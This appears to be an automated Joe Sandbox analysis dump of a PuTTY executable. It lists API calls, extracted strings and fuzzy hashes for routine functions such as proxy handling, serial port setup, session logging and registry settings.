                            • Proxy error: Server chose username/password authentication but we didn't offer it!, xrefs: 0040D1D1
                            • TTL expired, xrefs: 0040D0D6
                            • Proxy error: SOCKS proxy returned unexpected version, xrefs: 0040CE95
                            • Proxy error: We don't support GSSAPI authentication, xrefs: 0040D18E
                            • Connection not allowed by ruleset, xrefs: 0040D0BA
                            • General SOCKS server failure, xrefs: 0040D0B3
                            • Address type not supported, xrefs: 0040D0E4
                            • Proxy error: Unexpected proxy error, xrefs: 0040D288
                            • Proxy error: SOCKS proxy returned wrong version number, xrefs: 0040D079
                            • Host unreachable, xrefs: 0040D0C8
                            • Proxy error: SOCKS password subnegotiation contained wrong version number, xrefs: 0040CF0C
                            • ..\proxy.c, xrefs: 0040CFAD
                            • type == ADDRTYPE_NAME, xrefs: 0040CFB2
                            • Unrecognised SOCKS error code %d, xrefs: 0040D100
                            • Proxy error: , xrefs: 0040D093
                            • Proxy error: SOCKS proxy returned unrecognised address format, xrefs: 0040D144
                            • Proxy error: SOCKS proxy refused password authentication, xrefs: 0040CF34
                            • Command not supported, xrefs: 0040D0DD
                            Similarity
                            • API ID:
                            • String ID: ..\proxy.c$Address type not supported$Command not supported$Connection not allowed by ruleset$Connection refused$General SOCKS server failure$Host unreachable$Network unreachable$Proxy error: $Proxy error: SOCKS password subnegotiation contained wrong version number$Proxy error: SOCKS proxy did not accept our authentication$Proxy error: SOCKS proxy refused password authentication$Proxy error: SOCKS proxy returned unexpected version$Proxy error: SOCKS proxy returned unrecognised address format$Proxy error: SOCKS proxy returned wrong version number$Proxy error: Server chose username/password authentication but we didn't offer it!$Proxy error: Unexpected proxy error$Proxy error: We don't support GSSAPI authentication$TTL expired$Unrecognised SOCKS error code %d$type == ADDRTYPE_NAME
                            • API String ID: 0-3639339871
                            • Opcode ID: 016d38c4467efdd1764e6ecb26e4f0bb24677e77b5fa8c10c7cff475f0920d5c
                            • Instruction ID: 69e2ab597c61ee383b426aa36e28e967c6898aa5afca5646317ee10f0c80ccdf
                            • Opcode Fuzzy Hash: 016d38c4467efdd1764e6ecb26e4f0bb24677e77b5fa8c10c7cff475f0920d5c
                            • Instruction Fuzzy Hash: F6E10970D04304EADB319BA0CC85BAB77A4AF01704F2444BFF946BA2C2D67DD5898B5E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • BeginPaint.USER32(?,?), ref: 00410EFB
                            • SelectObject.GDI32(00000000), ref: 00410F10
                            • GetStockObject.GDI32(00000007), ref: 00410F14
                            • SelectObject.GDI32(00000000,00000000), ref: 00410F1C
                            • CreateSolidBrush.GDI32 ref: 00410F24
                            • SelectObject.GDI32(00000000,00000000), ref: 00410F2F
                            • GetClientRect.USER32(?,?), ref: 00410F39
                            • Rectangle.GDI32(00000000,?,?,?,?), ref: 00410F4C
                            • GetWindowTextLengthA.USER32(?), ref: 00410F53
                            • GetWindowTextA.USER32(?,?,?), ref: 00410F73
                            • SetTextColor.GDI32(00000000), ref: 00410F80
                            • SetBkColor.GDI32(00000000), ref: 00410F8D
                            • TextOutA.GDI32(00000000,?,?,?,?), ref: 00410FA8
                            • SelectObject.GDI32(00000000,?), ref: 00410FBB
                            • DeleteObject.GDI32(?), ref: 00410FC0
                            • EndPaint.USER32(?,?), ref: 00410FCB
                            • CreateCompatibleDC.GDI32(00000000), ref: 00410FDC
                            • SelectObject.GDI32(00000000), ref: 00410FEB
                            • _strlen.LIBCMT ref: 00410FF8
                            • GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00411003
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000016), ref: 0041101F
                            • InvalidateRect.USER32(?,00000000,00000000), ref: 0041102A
                            • DeleteDC.GDI32(00000000), ref: 00411031
                            • DeleteObject.GDI32 ref: 0041103F
                            • DefWindowProcA.USER32(?,?,?,?), ref: 00411058
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Object$SelectText$Window$Delete$ColorCreatePaintRect$BeginBrushClientCompatibleExtentInvalidateLengthPoint32ProcRectangleSolidStock_strlen
                            • String ID:
                            • API String ID: 2408264671-0
                            • Opcode ID: e305e72a266b91ab72d18c4f3fa9b5ead44b9e1ac33aac232e4525f7ffba0c9c
                            • Instruction ID: 6abfda51203b32e14dd2b3034279d45f381161c426946cc792a4a68efd743803
                            • Opcode Fuzzy Hash: e305e72a266b91ab72d18c4f3fa9b5ead44b9e1ac33aac232e4525f7ffba0c9c
                            • Instruction Fuzzy Hash: 77411776404208BFDB129FA4ED48DBF7FB9FB09762B004425FA06D1172C73589A1EB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCommState.KERNEL32(?,?), ref: 00449188
                              • Part of subcall function 0043D0E9: _wctomb_s.LIBCMT ref: 0043D14E
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D15B
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D166
                              • Part of subcall function 0043D0E9: _strcat.LIBCMT ref: 0043D18B
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(00000000,000003E9,00000180,00000000,00000000), ref: 0043D1D5
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 0043D1E7
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,00000197,-00000001,00000000), ref: 0043D1F9
                            • SetCommState.KERNEL32(?,?), ref: 0044933E
                            • SetCommTimeouts.KERNEL32(?,?), ref: 00449369
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CommItemMessageSend$State_strlen$Timeouts_strcat_wctomb_s
                            • String ID: 1.5$Configuring %d data bits$Configuring %s data bits$Configuring %s flow control$Configuring %s parity$Configuring baud rate %d$DSR/DTR$Invalid number of stop bits (need 1, 1.5 or 2)$RTS/CTS$Unable to configure serial port$Unable to configure serial timeouts$XON/XOFF$even$mark$odd$space
                            • API String ID: 3961186704-2457022346
                            • Opcode ID: 03a6c0eb3f1aebe563ddc1c87e5c792852f0696c982be64303c6c2160c1e2a32
                            • Instruction ID: 385d297f97ba48779de5a49694351bb137ed7cb214f0670bc8eacedc6c7de9e9
                            • Opcode Fuzzy Hash: 03a6c0eb3f1aebe563ddc1c87e5c792852f0696c982be64303c6c2160c1e2a32
                            • Instruction Fuzzy Hash: 64511861D00208BAEB116FB58C05FAF7A68BB45344F14847BF845B6292DBBD8D01E76E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0042E642
                            • _strlen.LIBCMT ref: 0042E64B
                              • Part of subcall function 00402263: _wctomb_s.LIBCMT ref: 004022D1
                              • Part of subcall function 0043D0E9: _wctomb_s.LIBCMT ref: 0043D14E
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D15B
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D166
                              • Part of subcall function 0043D0E9: _strcat.LIBCMT ref: 0043D18B
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(00000000,000003E9,00000180,00000000,00000000), ref: 0043D1D5
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 0043D1E7
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,00000197,-00000001,00000000), ref: 0043D1F9
                            • _strlen.LIBCMT ref: 0042E684
                            • _strlen.LIBCMT ref: 0042E839
                            • _strcat.LIBCMT ref: 0042E85E
                            • _strlen.LIBCMT ref: 0042E864
                            • _strlen.LIBCMT ref: 0042E8EE
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$ItemMessageSend$_strcat_wctomb_s
                            • String ID: %s=%s$USER=%s$client:SB %s IS <nothing>$client:SB %s IS:$client:SB TSPEED IS %s$client:SB TTYPE IS %s$server:SB %s SEND$server:SB TSPEED <something weird>$server:SB TSPEED SEND$server:SB TTYPE <something weird>$server:SB TTYPE SEND
                            • API String ID: 1921442178-3277828204
                            • Opcode ID: 7c7f586b0bcbabec83f8e0e0bf89d6799591987ab98ea94de0ef29bdd195d8c6
                            • Instruction ID: d978bed7bef436be9b4cf8cb6971a5d45b8f3368a0f1331694d8c95c4a28d650
                            • Opcode Fuzzy Hash: 7c7f586b0bcbabec83f8e0e0bf89d6799591987ab98ea94de0ef29bdd195d8c6
                            • Instruction Fuzzy Hash: FAD19C70904341AFDB216B769C81B6BBBA8EF12308F6486AFF4D1563C3D7789801C729
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegCreateKeyExA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Jumplist,00000000,00000000,00000000,0002001F,00000000,00410EAC,00000000,00000000,00410EAC,00000000,00446358,00410EAC,00410EAC,?), ref: 0044A155
                            • RegQueryValueExA.ADVAPI32(00000000,Recent sessions,00000000,?,00000000,?,?,00401130), ref: 0044A195
                            • RegQueryValueExA.ADVAPI32(?,Recent sessions,00000000,?,00000000,?), ref: 0044A1C5
                            • RegDeleteValueA.ADVAPI32(?,Recent sessions), ref: 0044A1DE
                            • RegCloseKey.ADVAPI32(?), ref: 0044A1F2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Value$Query$CloseCreateDelete
                            • String ID: Recent sessions$Software\SimonTatham\PuTTY\Jumplist
                            • API String ID: 2765499831-3076341284
                            • Opcode ID: 33fa4eebe227441cbc79a086bc8b46aae77859933597119e4ec4fc57548bfdb0
                            • Instruction ID: 9f5480baf368240e8820aeeeb7ca27388a414a254d1e4d11d876babc97ac05ef
                            • Opcode Fuzzy Hash: 33fa4eebe227441cbc79a086bc8b46aae77859933597119e4ec4fc57548bfdb0
                            • Instruction Fuzzy Hash: DB51C672D84109BEEB115FA09C459AFBB69EB04308F2440BBF501E2291D7799E50D75E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,..\conf.c,004739A0,00000000), ref: 00453560
                            • _strcat.LIBCMT ref: 00453573
                            • _strlen.LIBCMT ref: 00453580
                            • _strlen.LIBCMT ref: 0045358F
                            • _strncpy.LIBCMT ref: 004535A6
                            • _strlen.LIBCMT ref: 004535AF
                            • _strlen.LIBCMT ref: 004535BC
                            • _strcat.LIBCMT ref: 004535DA
                            • _strlen.LIBCMT ref: 00453622
                            • GetStdHandle.KERNEL32(000000F4,00470968,00000000,?,00000000,..\conf.c,004739A0,00000000), ref: 0045362D
                            • WriteFile.KERNEL32(00000000), ref: 00453634
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                            • String ID: ...$..\conf.c$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                            • API String ID: 3601721357-1758480307
                            • Opcode ID: 1f052af09f78f6c5da87c20373e7e2cc528e085fb5368bdede4697a67d900415
                            • Instruction ID: 1216cf6bcaea86d35bf7d84aa3ec953f54dbe1fbb7b6b298bbfb4767b12aa58f
                            • Opcode Fuzzy Hash: 1f052af09f78f6c5da87c20373e7e2cc528e085fb5368bdede4697a67d900415
                            • Instruction Fuzzy Hash: 5F314A725402046AEB31AF75DC81E9A7368FB44306F24082FF955D3243ED7CAA49872D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleA.KERNEL32(USER32,0044421E,00000000,00000000,0043D671,?,?,?,?,?,?,?,004405F0,00000002,0044421E,00000000), ref: 0043D4F3
                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0043D50F
                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0043D520
                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0043D531
                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0043D542
                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0043D553
                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0043D564
                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0043D575
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                            • API String ID: 667068680-68207542
                            • Opcode ID: 6505c980da757474385e97565001fa4a04f52fe1ccd50afa4bb62582726c64cc
                            • Instruction ID: f9e847ac59cb1791770e5d74383b9d2f949a21676cb87cbb4b86bcc9a4429f50
                            • Opcode Fuzzy Hash: 6505c980da757474385e97565001fa4a04f52fe1ccd50afa4bb62582726c64cc
                            • Instruction Fuzzy Hash: 70215E70E01A91AA8701EF26BCC052ABAEAF74C745722453FE00DD3250E73940CD8F6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _wctomb_s
                            • String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$..\logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$ASCII$Appending$Disabled writing$Error writing$SSH packets$SSH raw data$Writing new$ctx->state != L_OPENING$raw$unknown
                            • API String ID: 2865277502-1037274016
                            • Opcode ID: 00c047b4b6ee3c5e48d737068c417be3e8ed9bcbb7f899efb98abc9756c934af
                            • Instruction ID: 8fbe5d893b4878e3552394671719f13a06db53705e3d7a94d2e1139188ef5850
                            • Opcode Fuzzy Hash: 00c047b4b6ee3c5e48d737068c417be3e8ed9bcbb7f899efb98abc9756c934af
                            • Instruction Fuzzy Hash: F9419431900204AADF219E619981AAF3759EB04319F14C07BFD48BB293DB3DDE4987DE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegisterClassA.USER32(?), ref: 004110C5
                            • GetSysColor.USER32(00000018), ref: 004110D9
                            • GetSysColor.USER32(00000017), ref: 004110E2
                            • SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 00411110
                            • CreateFontIndirectA.GDI32(?), ref: 0041111D
                            • CreateCompatibleDC.GDI32(00000000), ref: 0041114D
                            • _strlen.LIBCMT ref: 0041115D
                            • GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00411169
                            • DeleteDC.GDI32(00000000), ref: 00411170
                            • GetWindowRect.USER32(?,?), ref: 0041117D
                            • CreateWindowExA.USER32(00000088,?,?,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004111C2
                            • ShowWindow.USER32(00000000,00000004), ref: 004111D0
                            • SetWindowTextA.USER32(00000000,?), ref: 004111DD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Create$ColorText$ClassCompatibleDeleteExtentFontIndirectInfoParametersPoint32RectRegisterShowSystem_strlen
                            • String ID: %dx%d$xE
                            • API String ID: 816365731-2198352637
                            • Opcode ID: bb4b9df590eabb9d0049178f5cecab3b04952861f3dc77c5bab16a062b66188d
                            • Instruction ID: 519e5213ff19f963489771f9485338d37e9b9a8d3968d304f5e11607ecc2562b
                            • Opcode Fuzzy Hash: bb4b9df590eabb9d0049178f5cecab3b04952861f3dc77c5bab16a062b66188d
                            • Instruction Fuzzy Hash: 00413D71D04218ABDB109F95EC48EEEBBBCFB48705F00447AF604E6261D7749A85DBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 004474AC: _strncpy.LIBCMT ref: 004474F3
                              • Part of subcall function 004474AC: _strncpy.LIBCMT ref: 00447507
                            • _strlen.LIBCMT ref: 0040C80F
                            • _strlen.LIBCMT ref: 0040C859
                            • _strlen.LIBCMT ref: 0040C886
                            • _strcat.LIBCMT ref: 0040C8D7
                            • _strlen.LIBCMT ref: 0040C8E2
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                              • Part of subcall function 0044E48E: _strlen.LIBCMT ref: 0044E4A5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat_strncpy$FileModuleName
                            • String ID: %s:%s$..\proxy.c$CONNECT %s:%i HTTP/1.1Host: %s:%i$HTTP/%i.%i %n$Proxy error: %s$Proxy error: HTTP response was absent$Proxy error: unexpected proxy error$Proxy-Authorization: Basic $len > 0
                            • API String ID: 2220528148-1415320180
                            • Opcode ID: 44066d4d1e1938bbbcc630d6b72b693e100de663154b0d18e5bdb6e0c4fdad66
                            • Instruction ID: 447fded6c1daa8885f089001badc28b7231b314849bf9aa69e2e59c09b91d4f6
                            • Opcode Fuzzy Hash: 44066d4d1e1938bbbcc630d6b72b693e100de663154b0d18e5bdb6e0c4fdad66
                            • Instruction Fuzzy Hash: 3BA1B171A01205BBDB20ABA5CCC6F9A7768EF04318F14417AF905A72C2D778A951CBDD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat_strlen
                            • String ID: %08x%*s$ (%d byte%s omitted)$%02x$%Y-%m-%d %H:%M:%S$%s packet #0x%lx, type %d / 0x%02x (%s)$%s packet type %d / 0x%02x (%s)$%s raw data at %s$Incoming$Outgoing$gvE$gvE
                            • API String ID: 432593777-2465974704
                            • Opcode ID: e1616b3bc9bebc0b7bc3a10a409ce4531e1ee10a379f09970a5fa083c75d4c0c
                            • Instruction ID: 7919a70cb201e2f2c8a71953919a0f509b02297f942be3d76562262a1e79fb02
                            • Opcode Fuzzy Hash: e1616b3bc9bebc0b7bc3a10a409ce4531e1ee10a379f09970a5fa083c75d4c0c
                            • Instruction Fuzzy Hash: 95918A71904248EBDF24DE98C881AEE37A8EB04309F24443BFD14A62D3D779DC45CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strncpyhtonl$ErrorLast_strcat_strlengetaddrinfogethostbynameinet_addr
                            • String ID: Host does not exist$Host not found$Network is down$gethostbyname: unknown error
                            • API String ID: 929124817-1679025516
                            • Opcode ID: f947a2b08b981d53c1d51f7dba97cf010a2826b67bb91a8ca2c414977d11608e
                            • Instruction ID: f81d876ec4e7c5e76facc13508d20924df56701e9dafbc652d8b647a32777cc5
                            • Opcode Fuzzy Hash: f947a2b08b981d53c1d51f7dba97cf010a2826b67bb91a8ca2c414977d11608e
                            • Instruction Fuzzy Hash: D27102B1904305EFEB209F64CC85A9BBBB5FB04308F20446FFA0597252D778D986DB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY,?), ref: 00449EE0
                            • RegQueryValueExA.ADVAPI32(?,RandSeedFile,00000000,00000001,?,00000001), ref: 00449F05
                            • RegCloseKey.ADVAPI32(?), ref: 00449F1E
                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00449F6C
                            • GetEnvironmentVariableA.KERNEL32(HOMEDRIVE,?,00000212), ref: 0044A024
                            • GetEnvironmentVariableA.KERNEL32(HOMEPATH,?,00000212), ref: 0044A038
                            • GetWindowsDirectoryA.KERNEL32(?,00000212), ref: 0044A06C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: EnvironmentVariable$AddressCloseDirectoryOpenProcQueryValueWindows
                            • String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
                            • API String ID: 640059220-1528239033
                            • Opcode ID: 3418c1e91284a318e44401508d2fe14a677bd39899c452e3021f25b2818e395a
                            • Instruction ID: b9e84c96b2ebda6f2a9b1cd1520a50ee996602bfc54b3840d2be6d67aca98011
                            • Opcode Fuzzy Hash: 3418c1e91284a318e44401508d2fe14a677bd39899c452e3021f25b2818e395a
                            • Instruction Fuzzy Hash: 67512371E04119BAEB21DBA1DD49EDB77BCAB44744F1000BAF905E3151E734EE48CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreatePipe.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,0040BF37), ref: 00448F7B
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,?,?,?,?,?,00000000,00000000,0040BF37), ref: 00448F8E
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,0040BF37), ref: 00448F9D
